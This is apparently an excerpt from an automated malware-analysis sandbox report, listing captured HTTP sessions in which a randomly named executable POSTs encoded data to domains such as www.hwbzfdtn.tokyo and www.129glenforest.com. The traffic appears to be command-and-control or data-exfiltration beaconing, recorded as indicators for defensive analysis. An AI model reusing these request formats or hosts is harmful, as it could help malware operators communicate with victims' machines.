                                                                                Data Ascii: GhEtuH=7AR1f4UdXjZ5ooIB7x766ZVbZ+1V5hfK+jlkL1lvCyDc74KTDwtR1E+lTaSN6YiSYQQv1rpzgeA2APw4m7JJZGh2bq9xF6dtVMXk4q1AY1tTA9/eP+z6tqoEGFuCJYvGvtXdyo7XzUVIIx0ysnAgWy/3TpmFbf+CvFQkMJV1hQAy0Tkx2Op64aWfzldDm2CBuoeWZIAsQWgmGvV9cg==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.7500028.223.59.213807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:50.035377026 CET773OUTPOST /3pje/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.hwbzfdtn.tokyo
                                                                                Origin: http://www.hwbzfdtn.tokyo
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.hwbzfdtn.tokyo/3pje/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 37 41 52 31 66 34 55 64 58 6a 5a 35 6f 49 59 42 35 57 58 36 79 5a 56 61 57 65 31 56 7a 42 66 4f 2b 6a 70 6b 4c 30 77 6f 43 41 58 63 37 61 53 54 41 31 5a 52 32 45 2b 6c 4c 4b 53 49 6e 49 69 76 59 51 63 34 31 71 46 7a 67 59 73 32 41 4e 34 34 6d 4d 64 47 59 57 68 30 55 4b 39 7a 4b 61 64 74 56 4d 58 6b 34 71 67 64 59 78 4a 54 48 4a 37 65 50 63 58 37 75 71 6f 4c 53 56 75 43 66 59 76 34 76 74 58 7a 79 70 6d 41 7a 57 64 49 49 30 49 79 73 79 38 6e 59 43 2f 78 64 4a 6e 7a 65 74 37 4b 33 56 64 66 43 71 64 4c 70 52 38 6a 78 6c 6c 54 73 73 6c 57 6d 4c 75 6b 33 6e 35 31 78 51 66 30 73 70 61 4f 55 71 30 4e 50 68 46 4d 4c 39 30 35 4b 5a 41 62 72 43 35 6a 57 66 43 74 6f 54 33 64 6d 63 77 61 53 58 30 3d
                                                                                Data Ascii: GhEtuH=7AR1f4UdXjZ5oIYB5WX6yZVaWe1VzBfO+jpkL0woCAXc7aSTA1ZR2E+lLKSInIivYQc41qFzgYs2AN44mMdGYWh0UK9zKadtVMXk4qgdYxJTHJ7ePcX7uqoLSVuCfYv4vtXzypmAzWdII0Iysy8nYC/xdJnzet7K3VdfCqdLpR8jxllTsslWmLuk3n51xQf0spaOUq0NPhFML905KZAbrC5jWfCtoT3dmcwaSX0=
                                                                                Dec 4, 2024 15:33:51.618423939 CET508INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Wed, 04 Dec 2024 14:33:51 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.hwbzfdtn.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/3pje/","code":401}0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.7500038.223.59.213807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:52.738652945 CET1786OUTPOST /3pje/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.hwbzfdtn.tokyo
                                                                                Origin: http://www.hwbzfdtn.tokyo
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.hwbzfdtn.tokyo/3pje/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 37 41 52 31 66 34 55 64 58 6a 5a 35 6f 49 59 42 35 57 58 36 79 5a 56 61 57 65 31 56 7a 42 66 4f 2b 6a 70 6b 4c 30 77 6f 43 41 50 63 37 4a 61 54 61 53 31 52 33 45 2b 6c 48 71 53 4a 6e 49 69 49 59 51 46 51 31 72 34 47 67 62 59 32 42 75 67 34 75 59 78 47 52 57 68 30 66 71 39 75 46 36 64 34 56 4e 6e 67 34 71 77 64 59 78 4a 54 48 49 4c 65 62 65 7a 37 69 4b 6f 45 47 46 75 77 4a 59 75 56 76 73 2f 46 79 70 79 51 7a 6e 39 49 49 51 55 79 75 41 55 6e 61 69 2f 7a 65 4a 6e 37 65 73 48 46 33 55 77 6b 43 70 42 68 70 53 73 6a 79 41 59 55 6f 2b 56 76 77 37 61 75 79 30 5a 4c 36 47 58 6c 67 59 57 4f 52 4e 4d 65 4e 6a 35 43 50 62 56 30 43 76 31 39 2f 6a 4e 76 5a 74 58 35 72 47 69 47 35 75 51 74 4c 69 30 32 37 6b 44 49 42 74 67 53 30 54 46 45 4d 62 67 6c 37 67 53 6a 54 48 68 44 48 2f 30 39 68 73 59 6a 2b 79 63 61 76 71 35 55 44 46 72 46 6f 77 61 6a 78 2b 36 73 55 6d 62 78 7a 4c 31 59 4b 50 2f 53 66 56 4f 56 36 42 6e 42 64 72 48 2b 4d 73 55 68 46 55 37 57 34 43 69 4d 59 54 63 53 61 73 70 64 66 31 73 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=7AR1f4UdXjZ5oIYB5WX6yZVaWe1VzBfO+jpkL0woCAPc7JaTaS1R3E+lHqSJnIiIYQFQ1r4GgbY2Bug4uYxGRWh0fq9uF6d4VNng4qwdYxJTHILebez7iKoEGFuwJYuVvs/FypyQzn9IIQUyuAUnai/zeJn7esHF3UwkCpBhpSsjyAYUo+Vvw7auy0ZL6GXlgYWORNMeNj5CPbV0Cv19/jNvZtX5rGiG5uQtLi027kDIBtgS0TFEMbgl7gSjTHhDH/09hsYj+ycavq5UDFrFowajx+6sUmbxzL1YKP/SfVOV6BnBdrH+MsUhFU7W4CiMYTcSaspdf1sqMrxqoJ0VJkJ7ZxOx+HnCL6axU3uzuenLBIxHBnf+bNZ/n49eLFHujZ/N96yASYU/BZvs9O5Mx30k1Jli1dZdKvYCL39ABMHCq9ImRfaWgW7vV+ovCFd1P/MqJbQBhD5an9I4v/b94I8bC/RJy5HyPYrtx7Vo086SURPhnld6luq8CUzBHm94KGvATNmNmtd6KqBDMIHOGqKAOXlTXHxPkE7tbsqHApym34Jed4/XRahV0rjkseYv/9u+ONISuwhTvWE5aPPMgNE/d7Alh5hKyYpeuFJffafnKsjOs3wwlQBs56K6xBQV2VI3xIk/74Ohhe3s6omFp5uF3HzepYhaRF0Va5JZizguvXftdNAOmnNGforzclKvuPTwryT0e5Kynh47Lf9dp+WI83XNpaQ0ClCdosT0aEJcyl/yGaqUa6FWE+K4y5e/5Mf9UyFfw0CAKdlJ2QvU1ByFyHq5WxSgVvpyU6IQdg7LfhhtvACUJ4wpEi5HQ1+zK2aIzpe4w4lacMNq6iwKLclWsRGfbhgza24bm5uczdNC9D+ZtRkTyTZEHQEdlCJY9i9etpvAmLDiELX9DAsGB791DfFLPBb9j3Vr2HBwv8lbX3fMHg84fm0vm9vncybWH8r1YgcCOAo0+D9JYVE9WLb99dS0WZj1YCs6R+4z96sEd [TRUNCATED]
                                                                                Dec 4, 2024 15:33:54.331841946 CET508INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Wed, 04 Dec 2024 14:33:54 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.hwbzfdtn.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/3pje/","code":401}0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.7500048.223.59.213807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:55.389847994 CET492OUTGET /3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.hwbzfdtn.tokyo
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:33:56.924983978 CET427INHTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Wed, 04 Dec 2024 14:33:56 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Cache: MISS
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 33 70 6a 65 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/3pje/","code":401}0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.75000554.176.168.58807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:02.627599001 CET762OUTPOST /zgqx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.129glenforest.com
                                                                                Origin: http://www.129glenforest.com
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.129glenforest.com/zgqx/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 69 72 2f 2f 68 37 43 66 55 51 55 77 70 61 58 47 47 49 56 63 64 55 6a 56 57 38 2b 4d 68 78 48 48 77 4b 39 62 35 57 6e 72 36 36 35 35 4f 77 6a 32 53 48 6b 62 2b 38 45 55 30 6f 6f 58 65 64 63 4d 61 2f 6c 34 79 63 65 52 74 61 4a 54 72 61 49 34 32 7a 43 51 79 4c 51 6a 57 50 4f 73 7a 43 64 67 2f 55 59 42 52 68 4b 53 70 66 39 74 4c 72 53 4b 30 6a 68 4a 30 42 6e 5a 4e 70 72 35 75 4f 62 59 4b 6c 49 48 74 5a 63 71 2b 42 6f 76 70 7a 54 63 30 4d 45 6d 6a 37 7a 2b 57 35 4a 51 36 2b 39 37 68 31 77 6d 49 41 39 47 32 62 48 66 4c 64 55 33 58 65 38 47 76 53 49 58 66 33 6d 4f 41 58 63 2f 6c 66 63 31 67 5a 33 6e 33 43 6f 56 72 5a 79 6d 6f 51 3d 3d
                                                                                Data Ascii: GhEtuH=ir//h7CfUQUwpaXGGIVcdUjVW8+MhxHHwK9b5Wnr6655Owj2SHkb+8EU0ooXedcMa/l4yceRtaJTraI42zCQyLQjWPOszCdg/UYBRhKSpf9tLrSK0jhJ0BnZNpr5uObYKlIHtZcq+BovpzTc0MEmj7z+W5JQ6+97h1wmIA9G2bHfLdU3Xe8GvSIXf3mOAXc/lfc1gZ3n3CoVrZymoQ==
                                                                                Dec 4, 2024 15:34:03.967509031 CET1236INHTTP/1.1 200
                                                                                Date: Wed, 04 Dec 2024 14:34:03 GMT
                                                                                Content-Type: text/html;charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: AWSALB=WVuwpbq+anIydnWZDpHI0cdP3fmqg422y24nInR6UeYZXsAVfyAyXrYWvjj4mBOcUWHehd4rYGLsEOxJ/fExcaie5+oiJQPMU5jkrYX93XkB3DrzBf85S8JiIIRJ; Expires=Wed, 11 Dec 2024 14:34:03 GMT; Path=/
                                                                                Set-Cookie: AWSALBCORS=WVuwpbq+anIydnWZDpHI0cdP3fmqg422y24nInR6UeYZXsAVfyAyXrYWvjj4mBOcUWHehd4rYGLsEOxJ/fExcaie5+oiJQPMU5jkrYX93XkB3DrzBf85S8JiIIRJ; Expires=Wed, 11 Dec 2024 14:34:03 GMT; Path=/; SameSite=None
                                                                                Server: nginx/1.26.2
                                                                                Set-Cookie: cfid=97c9321a-e0b7-4bb9-bc38-7048ebfe16fd;Path=/;Expires=Thu, 03-Dec-2054 22:25:33 UTC;HttpOnly
                                                                                Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:33 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322843771;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322843771;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:03 UTC;HttpOnly
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r
                                                                                Dec 4, 2024 15:34:03.967650890 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.75000654.176.168.58807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:05.327066898 CET782OUTPOST /zgqx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.129glenforest.com
                                                                                Origin: http://www.129glenforest.com
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.129glenforest.com/zgqx/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 69 72 2f 2f 68 37 43 66 55 51 55 77 70 35 50 47 46 76 42 63 4d 6b 6a 57 50 63 2b 4d 30 68 48 44 77 4b 42 62 35 58 69 75 36 6f 64 35 50 52 54 32 52 44 49 62 39 38 45 55 38 49 6f 57 61 64 63 62 61 2f 34 46 79 65 4b 52 74 62 70 54 72 62 34 34 33 46 4b 58 30 62 51 6c 44 66 4f 55 33 43 64 67 2f 55 59 42 52 68 75 30 70 65 56 74 4c 62 69 4b 6c 79 68 49 31 42 6e 61 4b 70 72 35 6c 75 62 63 4b 6c 4a 53 74 63 68 50 2b 48 73 76 70 32 33 63 30 2b 73 6e 32 72 7a 6b 5a 5a 49 66 79 4d 41 52 70 6b 63 6a 48 7a 6c 4a 2f 73 65 30 4b 72 56 56 4e 38 77 71 78 44 77 73 62 31 43 34 58 78 42 4b 6e 65 59 74 74 37 44 47 6f 31 4e 2f 6d 4c 54 69 2b 6e 30 53 36 4f 34 77 68 64 61 63 69 75 67 55 54 57 6d 6b 2f 61 38 3d
                                                                                Data Ascii: GhEtuH=ir//h7CfUQUwp5PGFvBcMkjWPc+M0hHDwKBb5Xiu6od5PRT2RDIb98EU8IoWadcba/4FyeKRtbpTrb443FKX0bQlDfOU3Cdg/UYBRhu0peVtLbiKlyhI1BnaKpr5lubcKlJStchP+Hsvp23c0+sn2rzkZZIfyMARpkcjHzlJ/se0KrVVN8wqxDwsb1C4XxBKneYtt7DGo1N/mLTi+n0S6O4whdaciugUTWmk/a8=
                                                                                Dec 4, 2024 15:34:06.531832933 CET1236INHTTP/1.1 200
                                                                                Date: Wed, 04 Dec 2024 14:34:06 GMT
                                                                                Content-Type: text/html;charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: AWSALB=RITJ5wlLqV+8CYQU5+UhyCpx5G5EfiSjCYGTd9CVN+aCcFI2aApBFFlhXkRC+Oa78AagEx6TxqxyVWYWRLi/0GVWg3FQLMVVfM2ulmu8RShpvQZlwZ//LsBRhUWJ; Expires=Wed, 11 Dec 2024 14:34:06 GMT; Path=/
                                                                                Set-Cookie: AWSALBCORS=RITJ5wlLqV+8CYQU5+UhyCpx5G5EfiSjCYGTd9CVN+aCcFI2aApBFFlhXkRC+Oa78AagEx6TxqxyVWYWRLi/0GVWg3FQLMVVfM2ulmu8RShpvQZlwZ//LsBRhUWJ; Expires=Wed, 11 Dec 2024 14:34:06 GMT; Path=/; SameSite=None
                                                                                Server: nginx/1.26.2
                                                                                Set-Cookie: cfid=813ce0e1-52a8-46b6-8658-76fa7f88bf8f;Path=/;Expires=Thu, 03-Dec-2054 22:25:36 UTC;HttpOnly
                                                                                Set-Cookie: cftoken=0;Path=/;Expires=Thu, 03-Dec-2054 22:25:36 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1733322846326;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1733322846326;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
                                                                                Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 04-Mar-2025 14:34:06 UTC;HttpOnly
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r
                                                                                Dec 4, 2024 15:34:06.532017946 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.75000754.176.168.58807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:34:08.160809040 CET1795OUTPOST /zgqx/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.129glenforest.com
                                                                                Origin: http://www.129glenforest.com
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.129glenforest.com/zgqx/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 69 72 2f 2f 68 37 43 66 55 51 55 77 70 35 50 47 46 76 42 63 4d 6b 6a 57 50 63 2b 4d 30 68 48 44 77 4b 42 62 35 58 69 75 36 6f 56 35 4f 6a 62 32 4c 69 49 62 38 38 45 55 2f 49 6f 54 61 64 63 6a 61 2f 77 42 79 65 48 6b 74 65 74 54 72 35 77 34 6a 6e 69 58 39 62 51 6c 42 66 4f 76 7a 43 63 69 2f 56 30 46 52 68 65 30 70 65 56 74 4c 5a 36 4b 6c 6a 68 49 33 42 6e 5a 4e 70 72 74 75 4f 62 34 4b 6c 51 6c 74 64 56 31 2f 32 51 76 71 57 6e 63 6e 39 45 6e 72 62 7a 69 56 35 4a 41 79 4d 4d 4b 70 67 45 56 48 77 34 53 2f 72 36 30 47 74 67 72 63 4f 67 43 72 6c 6f 4a 46 56 6d 5a 64 69 35 71 2f 2f 51 76 6c 38 2f 62 6f 47 63 45 75 36 33 75 32 69 6c 4c 6c 39 6f 46 75 2b 76 4f 75 5a 64 4e 43 45 71 6c 73 61 64 62 38 73 33 45 6f 48 79 56 48 47 38 4a 55 61 36 2b 45 6b 70 2f 46 53 6a 4f 4f 65 35 61 66 64 61 6f 5a 75 6f 41 37 53 6d 36 57 35 76 33 64 30 30 43 53 32 62 73 47 6a 41 2f 69 34 67 62 75 32 2f 53 2f 62 54 5a 51 58 63 44 4e 35 30 2f 31 30 74 57 37 70 4c 70 65 53 31 4d 37 77 65 59 45 54 37 35 37 36 2f [TRUNCATED]
                                                                                Data Ascii: GhEtuH=ir//h7CfUQUwp5PGFvBcMkjWPc+M0hHDwKBb5Xiu6oV5Ojb2LiIb88EU/IoTadcja/wByeHktetTr5w4jniX9bQlBfOvzCci/V0FRhe0peVtLZ6KljhI3BnZNprtuOb4KlQltdV1/2QvqWncn9EnrbziV5JAyMMKpgEVHw4S/r60GtgrcOgCrloJFVmZdi5q//Qvl8/boGcEu63u2ilLl9oFu+vOuZdNCEqlsadb8s3EoHyVHG8JUa6+Ekp/FSjOOe5afdaoZuoA7Sm6W5v3d00CS2bsGjA/i4gbu2/S/bTZQXcDN50/10tW7pLpeS1M7weYET7576/OlL8BXSHtRBqioyvARGZ1tJW7pbSrAlcrGpAUZpehWkoXpVK3cy1EJCAu/vSCkdcPt1b7J7XapSkveO9En6nqah96GEKqAEloPSEhoQpH/hZdOgxaEZE9WOO+8zxaWnyrmFCcWUrPmMWWeVOKxpLDrvqQbulIvHuShX4isIQB80r/G5yv2ZTdXMIyViGkXbqBMa2i4cYg9E0gSlsV4lo3vUAAazZ6cabCf4RZGMbHDWbeGyl9UKlInAQ5C0izgtE0EHAVCKr82ztAtkApw1Zb80hTlN2gEf/kHLUqgrLdOsLO70jg9cFJxkCGgGj6X32oztB9V35pgYSZneyS0jlyPkW+kml6k29TYS4OBQE24849JXZ1gt0IffHMdFqQe/CBhIdk6lDlFChk/U+vCjmjw4LysXJY2t9cNsRGiOAjL/UqBXpN6MLBvuVhu4uBGUzYrKivfgPmriu6aGL8Jn6Uvg6onA+2Mc/914cvF/0vFoJ/HMvgwuJ0T1zeNkRlzl3zdmSyjxhcBAbecCOQIE390c2A+v5Pde18nZ08CIKKpE5C55m7NL9qh19WuWCPlBV1kZ5JpYaaiKXrgZNLTZee2VD1EyELpgoev+yCNNVvcA7am90pwrYSJxL1HVuLIDK8M8SD60TRpDJJoJqJBDL8ZVC4X9Kat2zhT [TRUNCATED]
                                                                                Dec 4, 2024 15:34:09.475188971 CET1236INHTTP/1.1 200
                                                                                Date: Wed, 04 Dec 2024 14:34:09 GMT
                                                                                Content-Type: text/html;charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: AWSALB=L36BEEXH4YLE03FevxgMcJqV6qbPwTddUCe269sfRTBljzEDcIkIH9uK1Oe8SzJJH/V+vU3g4jrJLDyib/raNxbxSw001vDcbJG7s9BnUwVbI83k5akG+165RbzV; Expires=Wed, 11 Dec 2024 14:34:09 GMT; Path=/
                                                                                Set-Cookie: AWSALBCORS=L36BEEXH4YLE03FevxgMcJqV6qbPwTddUCe269sfRTBljzEDcIkIH9uK1Oe8SzJJH/V+vU3g4jrJLDyib/raNxbxSw001vDcbJG7s9BnUwVbI83k5akG+165RbzV; Expires=Wed, 11 Dec 2024 14:34:09 GMT; Path=/; SameSite=None
